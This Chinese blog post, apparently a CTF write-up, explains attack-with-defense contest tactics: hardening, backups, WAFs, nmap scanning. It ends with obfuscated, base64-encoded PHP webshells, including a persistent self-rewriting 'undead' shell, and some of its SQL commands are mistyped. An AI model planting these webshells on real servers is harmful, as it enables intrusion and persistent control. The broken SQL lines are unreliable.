awd赛后总结

您所在的位置:网站首页 gucs下跌严重 awd赛后总结

awd赛后总结

2023-08-10 15:16| 来源: 网络整理| 查看: 265

最近参加了国赛分区赛,我所在的分区正好是awd赛制,所以总结了下关于awd的基操,方便新手入门

简单来说就是三步

登录平台,查看规则,探索flag提交方式,比赛开始前有时间的话使用nmap或者httpscan等工具扫一下IP段,整理各队的IP(靶机的IP应该是比赛开始后才会给出)

登录ssh->dump源码->D盾去后门->一人写批量脚本,一个人去修->部署waf,流量监控

控制npc->加固npc(拿到别人的靶机也是一样),紧盯流量

下面来详细介绍具体流程

1.登录比赛平台,查看比赛信息

这此国赛主办方没有ssh密码,而是提供rsa公私钥,使用ssh-key方式进行登录

连接方法和密码方式相似,只不过是选择密钥而不用输入密码

如果主办方平台给的密码较为简单存在弱口令或者可能被爆破成功的机会,尽快修改密码,密码主要是三个方面

linux修改ssh即本地密码

passwd

修改后台登录密码

mysql -u root -p

show databases;

use test;

show tables;

select * from admin;

updata admin set user pass='123456'; //updata 表名 set 字段名 = ‘值’;

flush privileges;

修改mysql登录密码

方法一:

mysql>set password for root@localhost =password('ocean888');

config.php文件中是有数据库的连接信息,执行完上条命令后更改此文件

方法二:

mysqladmin -uroot -p 123456 password 123

root=用户名; 123456=旧密码; 123=新密码;

2.dump源码

使用ssh工具保留源码,复制两份,用d盾去扫一份

注意:如果使用tar命令打包文件夹,.index.php(隐藏类型文件)将不会被打包

或者使用scp命令,后续会详细介绍使用方法

数据库操作

数据库备份

登录数据库,命令备份数据库

mysqldump -u db_user -p db_passwd db_name > 1.sql  //备份指定数据库

cd /var/lib/mysql

mysqldump -u db_user -p db_passwd > 1.sql //先进入数据库目录再备份

mysqldump --all-databases > 1.sql //备份所有数据库

数据库还原

mysql -u db_user -p db_passwd db_name < 1.sql //还原指定数据库

cd /var/lib/mysql

mysql -u db_user db_passwd < 1.sql //先进入数据库目录再还原

3.站点防御部署check:

查看是否留有后门账户

关注是否运行了“特殊”进程

是否使用命令匹配一句话

关闭不必要端口,如远程登陆端口,木马端口

action:

d盾扫描删除预留后门文件,代码审计工具审计

流量监控脚本部署

WAF脚本部署  

挂waf:

注:如果挂了waf出现持续扣分,waf去掉

每个文件前边加 require_once(waf.php);

改 .user.ini配置文件 auto_prepend_file=;  包含在文件头

auto_append_file=;  包含在文件尾

文件监控脚本部署

注意:现上好waf再上文件监控

靶机没有python的话要先安python(视情况而定)

4.利用漏洞进行得分

利用漏洞进行既包括自己去审计挖掘漏洞,也包括看流量分析出其他师傅发现的漏洞的复现

5.编写脚本批量拿分

通过预留后门批量拿分

批量修改ssh账号密码

通过脚本批量获取flag

脚本批量提交flag

以上就是简单来说awd开局需要做的5件事,一下从攻击和防御两个方面来具体介绍awd玩法

攻击服务发现

使用nmap对c段或端口进行扫描(看主办方给的靶机情况而定)

nmap

知道IP地址扫端口

.\nmap 10.241.180.159 -p1-65535

扫C段

.\nmap 10.241.180.159/24

根据ip列表扫,有一个ip地址列表,将这个保存为一个txt文件,和namp在同一目录下,扫描这个txt内的所有主机

nmap -iL ip.txt

nmap扫描完毕后,win按住alt键

只提取端口

漏洞利用

如果存在命令执行漏洞,可以通过命令执行执行上传一句话木马,直接用py脚本批量传,美哉

echo PD9waHAgZXZhbCgkX1JFUVVFU1RbJzEnXSk7ID8+Cg==|base64 -d>>.index.php

#

过盾一句话

可以改造成header返回的马,可以把这个一句话木马放到index.php中,直接访问index.php,从header中拿到flag,既不容易被发现马,又不容易被其他队利用

   $a=1;$b="a=".$_GET['a'];parse_str($b);$k=(`$a`);header('cookie:'.$k);    

权限维持不死马

php file_put_contents

file_put_contents('.1ndex.php',base64_decode('PD9waHAgIAogICAgc2V0X3RpbWVfbGltaXQoMCk7ICAKICAgIGlnbm9yZV91c2VyX2Fib3J0KDEpOyAgCiAgICB1bmxpbmsoX19GSUxFX18pOyAgCiAgICB3aGlsZSgxKXsgIAogICAgICAgIGZpbGVfcHV0X2NvbnRlbnRzKCcubG5kZXgucGhwJywnPD9waHAgaWYobWQ1KCRfR0VUWyJwYXNzIl0pPT0iNTAxNjBjMmVjNGY0MGQ3M2Y5MDYxZjg5NjcxMjExNTciKXtAZXZhbCgkX1BPU1RbImNtZCJdKTt9ID8+Jyk7ICAKICAgICAgICBzbGVlcCgwKTsgIAogICAgfQo/Pg=='));

get:[email protected]

post:cmd=system("ls");

linux命令不死马

while true;do echo '' > x.php;sleep 1;done



【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3